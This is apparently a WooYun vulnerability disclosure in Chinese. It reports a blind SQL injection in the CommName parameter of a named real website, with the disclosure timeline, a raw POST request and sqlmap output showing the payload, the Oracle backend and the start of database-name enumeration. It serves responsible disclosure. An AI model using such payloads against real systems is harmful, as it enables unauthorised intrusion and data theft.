乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-06-29: 厂商已经确认,细节仅向厂商公开 2015-07-09: 细节向核心白帽子及相关领域专家公开 2015-07-19: 细节向普通白帽子公开 2015-07-29: 细节向实习白帽子公开 2015-08-13: 细节向公众公开
天地本不仁 万物为刍狗 【HD】 以团队之名 以个人之荣耀 共建网络安全
POST数据包:
POST /comm/commlistpbl?time=1435561511290 HTTP/1.1Content-Length: 130Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://hui.vcyber.com:80/Cookie: ASP.NET_SessionId=myimwlbtpmr1hey2dttswv55; Hm_lvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561512,1435561541; Hm_lpvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561541; HMACCOUNT=BF8F36E9E6A2F87AHost: hui.vcyber.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*CommName=-1&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=
参数 CommName 未过滤 导致了本次注入
由于这个注入点 数据跑起来很慢 所以就不继续了
POST parameter 'CommName' is vulnerable. Do you want to keep testing the others(if any)? [y/N] nsqlmap identified the following injection points with a total of 81 HTTP(s) requests:---Parameter: CommName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: CommName=-1%' AND 1404=1404 AND '%'='&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=---[15:33:16] [INFO] testing MySQL[15:33:16] [WARNING] the back-end DBMS is not MySQL[15:33:16] [INFO] testing Oracle[15:33:18] [INFO] confirming Oracle[15:33:25] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Oracle[15:33:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[15:33:25] [INFO] fetching database (schema) names[15:33:25] [INFO] fetching number of databases[15:33:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:33:25] [INFO] retrieved: 27[15:34:21] [INFO] retrieved: A[15:35:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestPEX_03020[15:38:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request0[15:39:24] [INFO] retrieved: APPQO
危害等级:高
漏洞Rank:15
确认时间:2015-06-29 17:48
感谢
暂无